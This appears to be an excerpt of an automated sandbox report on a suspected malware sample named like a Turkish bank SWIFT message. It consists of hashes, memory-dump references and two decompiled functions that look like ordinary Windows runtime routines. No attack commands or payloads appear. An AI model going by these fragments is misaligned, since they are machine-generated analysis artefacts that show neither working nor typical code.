                                                                    • Instruction ID: 53321ca8b4f196fd1101a15e274d4cf6aadd8500fcf81bdacf798d8f1c9c6f3e
                                                                    • Opcode Fuzzy Hash: c22a4a1f7bf6f2ab1fd1b1fb9ac79ec1f14ea4deacd160a9084166dec448fb4e
                                                                    • Instruction Fuzzy Hash: D390027120100403D1006199550C7170045A7D1381F51D511A5418668DD69689697161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
                                                                    • Instruction ID: 706adae81fac1b69c5ee255f0a8a3f0fc95bd063adde910edbde5ca7b5747946
                                                                    • Opcode Fuzzy Hash: b88a848dfbf260de66fc5693580924a55f251c62c2c666678096632e0e68cfe8
                                                                    • Instruction Fuzzy Hash: FF90026120504442D1006599540CA160045A7D1385F51D111A60586A5DC6758969B171
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
                                                                    • Instruction ID: a68b9a73b4f58e223c00397e911b9f2647d7fd94f7bde252f19a3a3d2430fd3f
                                                                    • Opcode Fuzzy Hash: 43e4785153d5c09b1d0ad7b27ffffddafb676afafad1cb98b8cf4e06211e6b85
                                                                    • Instruction Fuzzy Hash: 4590027520504442D50065995808A970045A7D1385F51D511A54186ACDC6948979B161
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                                                                    • Instruction ID: 91968a5095059730241b073b04e7b2e4a9e06d4be4f3047325c06f9067227b9d
                                                                    • Opcode Fuzzy Hash: 5545f04fe6d51fc7e9312fef755df04b8bf37b151dc422c84da54ba0539151d1
                                                                    • Instruction Fuzzy Hash: 9090026120144442D14062994808B1F4145A7E2382F91C119A914A664CC955896D6761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
                                                                    • Instruction ID: 7cf915b3097cdc123662fa6e205cee90e65e36a55c402b6ec24c1ef5789a9d81
                                                                    • Opcode Fuzzy Hash: 0a923c46b965ce52736a3de43dbef233b154a0edb949007e9ed1b4d5c37c70db
                                                                    • Instruction Fuzzy Hash: 6E90027120100842D10061994408B560045A7E1381F51C116A5118764DC655C9697561
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
                                                                    • Instruction ID: e2a77e1934ce7ececd105d68d442883546b4a4eb8a10d563cd1aa91e7de36d55
                                                                    • Opcode Fuzzy Hash: ea1cef02c4943878e00aceac6ae498df6fd84e89a518a53eac03b806664fea84
                                                                    • Instruction Fuzzy Hash: B690027160500802D150719944187560045A7D1381F51C111A5018764DC7958B6D76E1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                                                                    • Instruction ID: 2cf3fd64b464971903909d1949d60d66a9abc8bb29f4f320b609942e7b2cb07a
                                                                    • Opcode Fuzzy Hash: c5077cd0272ac419251021b04f995e2d2c87fd91930c90b727f62e575d528d2f
                                                                    • Instruction Fuzzy Hash: 4290027120140402D1006199480C7570045A7D1382F51C111AA158665EC6A5C9A97571
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
                                                                    • Instruction ID: 8e1f1e5186a7c5c7f42f8fe7f7c89c2d5871950250e4acaace7811e7fde50848
                                                                    • Opcode Fuzzy Hash: cb82983557f169fdba74634df085042186f316df56db7b112d7bfa69c6dba578
                                                                    • Instruction Fuzzy Hash: 9590027120504842D14071994408A560055A7D1385F51C111A50587A4DD6658E6DB6A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: 70a30b0483fc1539411757e17cdb1b0216f8cd4f454f0515a8d01e42126d9416
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 26%
                                                                    			E018C645B(void* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                                                    				signed int _v8;
                                                                    				void* _v36;
                                                                    				intOrPtr _v48;
                                                                    				intOrPtr _v52;
                                                                    				intOrPtr _v56;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				intOrPtr _v68;
                                                                    				intOrPtr _v72;
                                                                    				intOrPtr _v76;
                                                                    				intOrPtr _v80;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				intOrPtr _t48;
                                                                    				intOrPtr _t49;
                                                                    				intOrPtr _t50;
                                                                    				intOrPtr* _t52;
                                                                    				char _t56;
                                                                    				void* _t69;
                                                                    				char _t72;
                                                                    				void* _t73;
                                                                    				intOrPtr _t75;
                                                                    				intOrPtr _t79;
                                                                    				void* _t82;
                                                                    				void* _t84;
                                                                    				intOrPtr _t86;
                                                                    				void* _t88;
                                                                    				signed int _t90;
                                                                    				signed int _t92;
                                                                    				signed int _t93;
                                                                    
                                                                    				_t80 = __edx;
                                                                    				_t92 = (_t90 & 0xfffffff8) - 0x4c;
                                                                    				_v8 =  *0x198d360 ^ _t92;
                                                                    				_t72 = 0;
                                                                    				_v72 = __edx;
                                                                    				_t82 = __ecx;
                                                                    				_t86 =  *((intOrPtr*)(__edx + 0xc8));
                                                                    				_v68 = _t86;
                                                                    				E018DFA60( &_v60, 0, 0x30);
                                                                    				_t48 =  *((intOrPtr*)(_t82 + 0x70));
                                                                    				_t93 = _t92 + 0xc;
                                                                    				_v76 = _t48;
                                                                    				_t49 = _t48;
                                                                    				if(_t49 == 0) {
                                                                    					_push(5);
                                                                    					 *((char*)(_t82 + 0x6a)) = 0;
                                                                    					 *((intOrPtr*)(_t82 + 0x6c)) = 0;
                                                                    					goto L3;
                                                                    				} else {
                                                                    					_t69 = _t49 - 1;
                                                                    					if(_t69 != 0) {
                                                                    						if(_t69 == 1) {
                                                                    							_push(0xa);
                                                                    							goto L3;
                                                                    						} else {
                                                                    							_t56 = 0;
                                                                    						}
                                                                    					} else {
                                                                    						_push(4);
                                                                    						L3:
                                                                    						_pop(_t50);
                                                                    						_v80 = _t50;
                                                                    						if(_a4 == _t72 && _t86 != 0 && _t50 != 0xa &&  *((char*)(_t82 + 0x6b)) == 1) {
                                                                    							E018B2280(_t50, _t86 + 0x1c);
                                                                    							_t79 = _v72;
                                                                    							 *((intOrPtr*)(_t79 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                    							 *((intOrPtr*)(_t79 + 0x88)) =  *((intOrPtr*)(_t82 + 0x68));
                                                                    							 *((intOrPtr*)(_t79 + 0x8c)) =  *((intOrPtr*)(_t82 + 0x6c));
                                                                    							 *((intOrPtr*)(_t79 + 0x90)) = _v80;
                                                                    							 *((intOrPtr*)(_t79 + 0x20)) = _t72;
                                                                    							E018AFFB0(_t72, _t82, _t86 + 0x1c);
                                                                    						}
                                                                    						_t75 = _v80;
                                                                    						_t52 =  *((intOrPtr*)(_v72 + 0x20));
                                                                    						_t80 =  *_t52;
                                                                    						_v72 =  *((intOrPtr*)(_t52 + 4));
                                                                    						_v52 =  *((intOrPtr*)(_t82 + 0x68));
                                                                    						_v60 = 0x30;
                                                                    						_v56 = _t75;
                                                                    						_v48 =  *((intOrPtr*)(_t82 + 0x6c));
                                                                    						asm("movsd");
                                                                    						_v76 = _t80;
                                                                    						_v64 = 0x30;
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						asm("movsd");
                                                                    						if(_t80 != 0) {
                                                                    							 *0x198b1e0(_t75, _v72,  &_v64,  &_v60);
                                                                    							_t72 = _v76();
                                                                    						}
                                                                    						_t56 = _t72;
                                                                    					}
                                                                    				}
                                                                    				_pop(_t84);
                                                                    				_pop(_t88);
                                                                    				_pop(_t73);
                                                                    				return E018DB640(_t56, _t73, _v8 ^ _t93, _t80, _t84, _t88);
                                                                    			}


































                                                                    0x018c645b
                                                                    0x018c6463
                                                                    0x018c646d
                                                                    0x018c6475
                                                                    0x018c647a
                                                                    0x018c647e
                                                                    0x018c6480
                                                                    0x018c648c
                                                                    0x018c6490
                                                                    0x018c6495
                                                                    0x018c6498
                                                                    0x018c649b
                                                                    0x018c649f
                                                                    0x018c64a1
                                                                    0x01907c07
                                                                    0x01907c09
                                                                    0x01907c0c
                                                                    0x00000000
                                                                    0x018c64a7
                                                                    0x018c64a7
                                                                    0x018c64aa
                                                                    0x01907bf7
                                                                    0x01907c00
                                                                    0x00000000
                                                                    0x01907bf9
                                                                    0x01907bf9
                                                                    0x01907bf9
                                                                    0x018c64b0
                                                                    0x018c64b0
                                                                    0x018c64b2
                                                                    0x018c64b2
                                                                    0x018c64b3
                                                                    0x018c64ba
                                                                    0x018c6553
                                                                    0x018c655e
                                                                    0x018c6566
                                                                    0x018c656c
                                                                    0x018c6575
                                                                    0x018c657f
                                                                    0x018c6585
                                                                    0x018c6588
                                                                    0x018c6588
                                                                    0x018c64c7
                                                                    0x018c64cb
                                                                    0x018c64ce
                                                                    0x018c64d3
                                                                    0x018c64da
                                                                    0x018c64e5
                                                                    0x018c64ed
                                                                    0x018c64f1
                                                                    0x018c64f5
                                                                    0x018c64f6
                                                                    0x018c64fa
                                                                    0x018c6502
                                                                    0x018c6503
                                                                    0x018c6504
                                                                    0x018c6507
                                                                    0x018c651a
                                                                    0x018c6524
                                                                    0x018c6524
                                                                    0x018c6526
                                                                    0x018c6526
                                                                    0x018c64aa
                                                                    0x018c652c
                                                                    0x018c652d
                                                                    0x018c652e
                                                                    0x018c6539

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID: 0$0
                                                                    • API String ID: 3446177414-203156872
                                                                    • Opcode ID: ebff1aef64de8c75c5e21339b1c536c7ded712a6c52168520e0233735c33d7cb
                                                                    • Instruction ID: d303b4e568a93e6a3d33b8d648734c377ca8c226836c7e4c6f6987360623485f
                                                                    • Opcode Fuzzy Hash: ebff1aef64de8c75c5e21339b1c536c7ded712a6c52168520e0233735c33d7cb
                                                                    • Instruction Fuzzy Hash: 59415BB16087069FC311CF28C484A1ABBE5BB89718F14496EF588DB341D731EA05CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 53%
                                                                    			E0192FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                    				void* _t7;
                                                                    				intOrPtr _t9;
                                                                    				intOrPtr _t10;
                                                                    				intOrPtr* _t12;
                                                                    				intOrPtr* _t13;
                                                                    				intOrPtr _t14;
                                                                    				intOrPtr* _t15;
                                                                    
                                                                    				_t13 = __edx;
                                                                    				_push(_a4);
                                                                    				_t14 =  *[fs:0x18];
                                                                    				_t15 = _t12;
                                                                    				_t7 = E018DCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                    				_push(_t13);
                                                                    				E01925720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                    				_t9 =  *_t15;
                                                                    				if(_t9 == 0xffffffff) {
                                                                    					_t10 = 0;
                                                                    				} else {
                                                                    					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                    				}
                                                                    				_push(_t10);
                                                                    				_push(_t15);
                                                                    				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                    				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                    				return E01925720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                    			}










                                                                    0x0192fdda
                                                                    0x0192fde2
                                                                    0x0192fde5
                                                                    0x0192fdec
                                                                    0x0192fdfa
                                                                    0x0192fdff
                                                                    0x0192fe0a
                                                                    0x0192fe0f
                                                                    0x0192fe17
                                                                    0x0192fe1e
                                                                    0x0192fe19
                                                                    0x0192fe19
                                                                    0x0192fe19
                                                                    0x0192fe20
                                                                    0x0192fe21
                                                                    0x0192fe22
                                                                    0x0192fe25
                                                                    0x0192fe40

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0192FDFA
                                                                    Strings
                                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0192FE2B
                                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0192FE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                    • API String ID: 885266447-3903918235
                                                                    • Opcode ID: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                                                                    • Instruction ID: 369415b27afc16e7d6872bb818ceb05f4d4aba4e702e6cd65eacb19685f711be
                                                                    • Opcode Fuzzy Hash: 58d74615eaf30326e1242e818a4b544a14928d0f87ea5f915888e4e03260a6db
                                                                    • Instruction Fuzzy Hash: 5EF0C272240211BBEA212A45DC02E73BB6AEB84B30F150218F628961D5DA62B920D7A0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%